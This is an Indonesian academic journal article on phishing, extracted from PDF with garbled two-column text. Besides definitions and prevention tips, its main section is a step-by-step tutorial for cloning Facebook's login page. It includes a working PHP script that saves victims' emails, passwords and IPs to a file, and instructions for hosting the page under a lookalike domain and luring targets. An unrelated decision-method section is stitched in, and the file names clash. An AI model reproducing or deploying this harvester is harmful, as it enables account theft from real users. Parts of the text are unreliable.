Anda di halaman 1dari 8

ISSN : 1978-6603

PHISING SEBAGAI SALAH SATU BENTUK ANCAMAN DALAM DUNIA CYBER

Dian Rachmawati#1
#1
Program Studi Sistem Komputer, Universitas Sumatera Utara
Jl. Alumni no.9 Medan
Email : #1dee230783@gmail.com

Abstrak

Kejahatan di dunia siber adalah suatu kondisi yang terkait dengan aktivitas criminal dengan
menggunakan komputer atau jaringan komputer sebagai alat bantu dan juga sebagai target. Phising
adalah salah satu bentuk dari kejahatan elektronik dalam bentuk penipuan, dimana korban dipancing
dengan tujuan untuk mengambil semua informasi penting. Phising dapat terjadi pada siapa saja dari
lingkaran apapun. Phising bertujuan untuk mencuri data setelah memanipulasi seseorang dengan
tampilan situs web tertentu. Penipuan phising dapat dicegah. Pengguna harus berhati-hati ketika
mendapatkan email atau link mencurigakan.

Kata Kunci: Phising, Cyber Crime, Computer Security, Deface

Abstract

Cyber crimes is a term that refers to criminal activity with a computer or network of computers as
a tool and a target. Phishing is one form of electronic crime in the form of fraud, where the victim in
fishing to take all the important information. Phishing can happen to anyone of any circle. Phishing is to
steal data after defacing someone on view certain websites. Phishing scams can be prevented. User must
be careful when getting suspicious email or link.

Keywords :Phising , Cyber Crime , Computer Security, Deface

209
Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber

PENDAHULUAN pada http://www.it-artikel.com/


Dalam dunia komunikasi data global 2012/04/artikel-hardware-komputer.html.
dan perkembangan teknologi informasi yang
senantiasa berubah serta cepatnya Menurut Garfinkel dan Spafford, ahli dalam
perkembangan software, keamanan computer security, komputer dikatakan aman jika
merupakan suatu isu yang sangat penting, bisa diandalkan dan perangkat lunaknya
baik itu keamanan fisik, data maupun aplikasi. bekerja sesuai dengan yang diharapkan.
Masalah keamanan dankerahasiaan data
merupakan salah satu aspek penting dari Menurut Bruce (1996), Inti dari
suatu sistem informasi. keamanan komputer adalah melindungi
komputer dan jaringannya dengan tujuan
Keamanan komputer adalah suatu mengamankan informasi yang berada di
cabang teknologi yang dikenal dengan nama dalamnya. Keamanan komputer sendiri
keamanan informasi yang diterapkan pada meliputi beberapa aspek, antara lain:
komputer. Sasaran keamanan komputer
antara lain adalah sebagai perlindungan 1. Kerahasiaan (Confidentiality)
informasi terhadap pencurian atau korupsi, Layanan yang digunakan untuk
atau pemeliharaan ketersediaan, seperti menjaga informasi
dijabarkan dalam kebijakan keamanan. dari siapapun, kecuali yang memiliki
Menurut Howard (1997) dalam bukunya An kunci rahasia atau otoritas untuk
Analysis of security incidents on the internet membuka informasi yang telah
menyatakan bahwa: disandikan.

Keamanan komputer adalah tindakan 2. Integrity


pencegahan dari serangan pengguna Penjagaan atau perlindungan data dari
komputer atau pengakses jaringan yang tidak upaya pengubahan data secara tidak
bertanggung jawab. sah. Untuk dapat menjaga keutuhan
Menurut Gollmann (2006) dalam data, suatu system harus dapat
bukunya Computer Security menyatakan mendeteksi manipulasi data dari pihak-
bahwa: pihak yang tidak berhak antara lain
Keamanan komputer adalah penyisipan, penghapusan, dan
berhubungan dengan pencegahan diri dan pendistribusian data lain ke dalam data
deteksi terhadap tindakan pengganggu yang yang asli.
tidak dikenali dalam sistem komputer.
3. Authentication
Dalam keamanan sistem komputer Berhubungan dengan identifikasi, baik
yang perlu dilakukan adalah untuk kesatuan system maupun informasi itu
mempersulit orang lain untuk mengganggu sendiri. Dua pihak yang saling
sistem yang dipakai, baik itu menggunakan berkomunikasi harus saling
komputer yang sifatnya stand alone, jaringan memperkenalkan diri. Informasi yang
local maupun jaringan global. Harus dikirimkan harus diautentikasi keaslian,
memastikan sitem bisa berjalan dengan baik isi data, waktu pengiriman dan
dan kondusif (ditemukenali, 10 April 2014 sebagainya.

Jurnal SAINTIKOM Vol. 13, No.3, September 2014 210


Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber

4. Non Repudiation penyerang berhubungan dengan pengguna


Merupakan usaha untuk mencegah dengan berpura-pura memalsukan bahwa
terjadinya penyangkalan terhadap mereka adalah host yang dapat dipercaya.
pengiriman/terciptanya suatu
informasi oleh yang TINJAUAN PUSTAKA
mengirimkan/membuat, juga
sebaliknya. 1.1 Cara Kerja Phising

Dari definisi phising dapat diketahui


Dalam ruang lingkup keamanan
cara kerja dari phising tersebut yang dilakukan
komputer, phising adalah salah bentuk
untuk menjebak korban oleh sang penjebak
kejahatan elektronik dalam bentuk penipuan.
(phisher). Phising yaitu aktivitas seseorang
Dimana proses phising ini bermaksud untuk
untuk mendapatkan informasi rahasia user
menangkap informasi yang sangat sensitif
dengan cara menggunakan email dan situs
seperti username, password dan detil kartu
web palsu yang tampilannya menyerupai
kredit dalam bentuk menyaru sebagai sebuah
tampilan asli atau resmi web sebenarnya.
entitas yang dapat dipercaya/ legitimate
organization dan biasanya berkomunikasi Informasi yang didapat atau dicari oleh
secara elektronik. phiser adalah berupa password account atau
nomor kartu kredit korban. Penjebak
Phising diperkenalkan pertama kali (phisher) menggunakan email, banner atau
pada tahun 1995. Menurut James (2005) cara pop-up window untuk menjebak user agar
pertama yang dilakukan phisher adalah mengarahkan ke situs web palsu (fake
dengan menggunakan algoritma yang webpage), dimana user diminta untuk
membuat nomor kartu kredit secara acak. memberikan informasi pribadinya. Disinilah
Jumlah kredit acak kartu yang digunakan phisher memanfaatkan kecerobohan dan
untuk membuat rekening AOL. Akun tersebut ketidak telitian user dalam web palsu
kemudian digunakan untuk spam pengguna tersebut untuk mendapatkan informasi. Cara
lain dan untuk berbagai hal lainnya. Program- kerja phising terlihat pada gambar 1:
program khusus seperti AOHell digunakan
untuk menyederhanakan proses. Praktek ini
diakhiri oleh AOL pada tahun 1995, ketika
perusahaan membuat langkah-langkah
keamanan untuk mencegah keberhasilan
penggunaan angka kredit secara acak kartu.

Phising dikenal juga sebagai Brand


spoofing atau Carding adalah sebuah
bentuk layanan yang menipu anda dengan
menjanjikan keabsahan dan keamanan
transfer data yang anda lakukan. Menurut
Felten et al spoofing (1997) dapat Gambar 1 Cara Kerja dan Alur informasi
didefinisikan sebagai Teknik yang digunakan Phising
untuk memperoleh akses yang tidak sah ke
suatu komputer atau informasi, dimana

211 Jurnal SAINTIKOM Vol. 13, No.3, September 2014


Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber

Berikut ini adalah aspek-aspek ancaman yang membawa anda ke sebuah laman web
terinfeksi oleh virus phising: phising
Atau mungkin pop-up yang tampak persis
1) Manipulasi Link seperti halaman resmi.
Sebagian teknik phising menggunakan
manipulasi link sehingga yang terlihat seperti 2.2 Teknik Phising
alamat dari institusi yang asli. URL yang salah Dalam memancing korbannya seorang
ejaannya atau penggunaan subdomain adalah phiser melakukan beberapa teknik antara lain:
trik umum digunakan oleh phisher, seperti
contoh URL dibawah: 1) Email Spoofing
Teknik ini biasa digunakan phiser dengan
www.micosoft.com mengirim email ke jutaan penggunaan
www.mircosoft.com dengan menyaru berasal dari institusi
www.verify-microsoft.com resmi. Biasanya email berisi pemintaan
dan bukannya www.microsoft.com nomor kredit, password atau
mendownload form tertentu (Joshi,
2) Filter Evasion 2012:5).
Phisher telah menggunakan gambar (bukan
teks) sehingga mengecoh pengguna sehingga 2) Pengiriman Berbasis Web
menyerahkan informasi pribadinya. Ini adalah Pengiriman berbasis web adalah salah
alasan Gmail atau Yahoo akan mematikan satu teknik Phising yang paling canggih.
gambar secara default untuk email yang Juga dikenal sebagai man-in-the-
masuk. middle, hacker terletak diantara situs
Gambar 2 adalah salah satu contoh email web asli dan sistem phising.
phising:
3) Pesan Instan (chatting)
Olah pesan cepat adalah metode dimana
pengguna menerima pesan dengan link
yang mengarahkan mereka ke situs web
Phising palsu yang memiliki tampilan
yang sama dan merasa sebagai situs
yang sah.

4) Trojan hosts
Trojan hosts, hacker terlihat mencoba u
ntuk login ke account pengguna anda
Gambar 2 Email Phising yang dihubungkan ke untuk mengumpulkan
sebuah halaman web kredensial melalui mesin lokal. Informasi
yang diperoleh kemudian dikirim ke
Untuk membuat e-mail phising tampak lebih phisher.
asli, para phisher/scammer akan meletakkan :
5) Manipulasi tautan (link)
Sebuah link yang dihubungkan ke halaman Manipulasi link adalah teknik dimana
web yang sah, tetapi sebenarnya phisher mengirimkan link ke sebuah

Jurnal SAINTIKOM Vol. 13, No.3, September 2014 212


Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber

website. Bila pengguna mengklik pada $username = $_POST['email'];


link tersebut maka akan terbuka ke $password = $_POST['pass'];
website phisher bukan link website $ip = $_SERVER['REMOTE_ADDR'];
sebenarnya. $today = date("F j, Y, g:i a");

6) Malware Phising $handle = fopen($file, 'a');


Penipuan phising melibatkan malware fwrite($handle,
memerlukan cara untuk dijalankan pada "++++++++++++++++++++++++++++++++++
komputer pengguna. Malware ini ++++++++++++++++++");
biasanya melekat pada email yang fwrite($handle, "\n");
dikirimkan kepada pengguna oleh fwrite($handle, "Email: ");
phisher. Setelah korban mengklik pada fwrite($handle, "$username");
link maka malware akan mulai berfungsi. fwrite($handle, "\n");
Malware tersebut terkadang disertakan fwrite($handle, "Password: ");
pada file download. fwrite($handle, "$password");
fwrite($handle, "\n");
Pembahasan
fwrite($handle, "IP Address: ");
Phising dalam bentuk web spoofing
fwrite($handle, "$ip");
dapat dibuat menggunakan software MS-
fwrite($handle, "\n");
Front Page, XAMPP, Notepad, serta
fwrite($handle, "Date Submitted: ");
Dreamweaver.
fwrite($handle, "$today");
fwrite($handle, "\n");
Berikut penjelasan bagaimana cara
fwrite($handle,
pembuatan Phising:
"++++++++++++++++++++++++++++++++++
++++++++++++++++++");
1. Tentukan target website (dalam
fwrite($handle, "\n");
pembahasan ini
fwrite($handle, "\n");
http://www.facebook.com/ )
fclose($handle);
2. Tekan CTRL+U (nanti akan tampil script).
echo "<script LANGUAGE=\"JavaScript\">
3. Select all (CTRL+A), trus copy (CTRL+C),
<!--
pastekan(CTRL+V) di notepad.
window.location=\"http://www.facebook.
4. Search (CTRL+F), lalu masukan.
com\";
// -->
action=https://www.facebook.com/login.p
</script>";
hp?login_attempt=1
?></div>
</div>
5. Ganti https://www.facebook.com/login.ph
</form>
p?login_attempt=1 dengan script.php
6. Save file tersebut dengan nama index.html
9. Save file dengan nama script.php
7. New file (CTRL+N)
10. New file (CTRL+N)
8. Pastekan script berikut ini [9]
11. Ketik : Hasil Phising akan tersimpan disini
12. Save file dengan nama storage.txt
<?php
13. Upload file itu ke hostingan anda.
$file = "storage.txt";
Misal idhostinger.com

213 Jurnal SAINTIKOM Vol. 13, No.3, September 2014


Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber

14. Untuk cara upload file ke hostingan,


lakukan cara berikut :
15. Buatlah akun pada idhostinger.com
16. Isi formulir pendaftaran dengan benar
sebagai contoh gambar 3

Gambar 4 Pemilihan Domain untuk Web Phising

23. Klik "buat" dan tunggu proses


pembuatannya.
24. Jika domain sudah dibuat, klik "beralih"
Gambar 3 Formulir Pendaftaran
pada sebelah kanan
25. Kini anda berada pada cpanel domain
17. Jangan lupa check list "saya setuju dengan
anda. Anda gulung kebawah scroll barnya.
ketentuan penggunaan layanan" lalu klik
Masuk ke file manager 3 terlihat
"Buat Akun".
padagambar 5.
18. Setelah itu anda masuk ke akun email
anda untuk verifikasi akun hosting anda
19. Klik tautan yang ada di kotak masuk yahoo
anda untuk mengaktifkan akun hosting.
20. Kini akun anda sudah aktif dan anda akan
diarahkan ke
http://cpanel.idhostinger.com/switcher.
Disitu anda klik "buat akun baru".
21. Pilih yang gratis (sebelah kiri) dan klik
"order!
22. Selanjutnya, anda pilih domain dan isi
kolom tersebut. Kolom domain isikan Gambar 5 Cpanel Domain
dengan domain (link) yang nantinya akan
dijadikan phising. Domain (link) pilih 26. Selanjutnya anda masuk ke public html.
dengan nama yang mirip dengan web yang Nah silahkan anda upload ketiga file
ingin diduplikasi terlihat pada gambar 4. phising tadi disitu dengan cara klik
"upload".
27. Klik "pilih file" untuk memilih script
phisingnya dan klik tanda cawang hijau
untuk upload pada gambar 6.

Jurnal SAINTIKOM Vol. 13, No.3, September 2014 214


Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber

Gambar 6 Pemilihan Script Phising


Gambar 8 Setting Chmod Direktori dan File
28. Klik lagi tanda cawang hijaunya pada
gambar 7. 31. Klik tanda panah biru untuk kembali ke
public html.
32. Sekarang anda buka domain anda dan
jadilah phising facebook anda pada
gambar 9. Silahkan anda jebak target
anda untuk masuk ke web phising anda
dan suruh loginkan akun facebooknya
disitu. Alhasil email dan passwordnya
akan tersimpan di logs.tx

29. Selanjutnya klik tanda panah biru.


30. Jangan lupa ubah chmod/permissionnya
menjadi 777 dengan cara centang
"logs.txt" lalu klik "chmod pada gambar 8.

3. Metode Multifactor Evaluation Gambar 9 Halaman Phising Facebook


Process(MFEP)
Dalam metode MFEP ini pengambilan Simpulan
keputusan dilakukan dengan memberikan Phising adalah sebuah bentuk layanan
pertimbangan subyektif dan intuitif terhadap yang bersifat menipu dengan menjanjikan
Faktor yang dianggap penting. Pertimbangan- keabsahan dan keamanan transfer data.
pertimbangan tersebut berupa pemberian Berikut 10 tips Kaspersky Lab untuk mencegah
bobot (weightingsystem) atas multifactor yang dari serangan phising:
terlibat dan dianggap penting tersebut.
1. Untuk situs sosial seperti Facebook, buat
bookmark untuk halaman login atau

215 Jurnal SAINTIKOM Vol. 13, No.3, September 2014


Dian Rachmawati, phising sebagai salah satu bentuk ancaman dalam dunia cyber

mengetik URL www.facebook.com secara James, L. 2005. Phishing Exposed, MA:


langsung di browser address bar. Syngress. Maryland.
2. Jangan mengklik link pada pesan email.
3. Hanya mengetik data rahasia pada website Preeti, Emmanuel, Joshi. 2012.Forensic
yang aman. Analysis of Email Date and Time
4. Mengecek akun bank Anda secara regular Spoofing, Proceedings of the 2012
dan melaporkan apapun yang Third International Conference on
mencurigakan kepada bank Anda. Computer and Communication
5. Kenali tanda giveaway yang ada dalam Technology: India.
email phising
a. Jika hal itu tidak ditujukan secara http://tekno.kompas.com/read/2009/05/27/1
personal kepada anda. 7001058/10.Tips.Mencegah.Serangan.
b. Jika anda bukan satu-satunya Phising
penerima email.
c. Jika terdapat kesalahan ejaan, tata http://ramadhanlmzero.blogspot.com/2013/0
bahasa atau sintaks yang buruk atau 2/cara-membuat-phising-
kekakuan lainnya dalam penggunaan facebook.html
bahasa. Biasanya ini dilakukan
penyebar phising untuk mencegah Web Spoofing: An Internet Con Game. Edward
filtering. W. Felten, Dirk Balfanz, Drew Dean,
6. Menginstall software untuk kemanan and Dan S. Wallach, Technical Report:
internet dan tetap mengupdate antivirus. 540-96.
7. Menginstall patch keamanan.
8. Waspada terhadap email dan pesan instan Department of Computer Science, Princeton
yang tidak diminta. University, revised February 1997
9. Berhati-hati ketika login yang meminta hak (Original version: December 1996)
administrator. Cermati alamat URL-nya
yang ada di address bar. http://newsatthisblog.blogspot.com/2013/04/
10. Back up data anda. cara-membuat-phising-facebook.html

http://www.it-artikel.com/2012/04/artikel-
DAFTAR PUSTAKA hardware-komputer.html
Howard, J.1997. An Analysis of Security
Incidents on the Internet 1989-1995,
(PhD thesis). Engineering and Public
Policy: Carnegie Mellon University.

Golmann, Dieter. 2006. Computer Security.


England: John Wiley.

Schneier, Bruce. 1996.Applied Cryptography:


Protocols, Algorithms, and Source Code
in C, 2nd ed, John Wiley & Son Inc: New
Jersey.

Jurnal SAINTIKOM Vol. 13, No.3, September 2014 216

Anda mungkin juga menyukai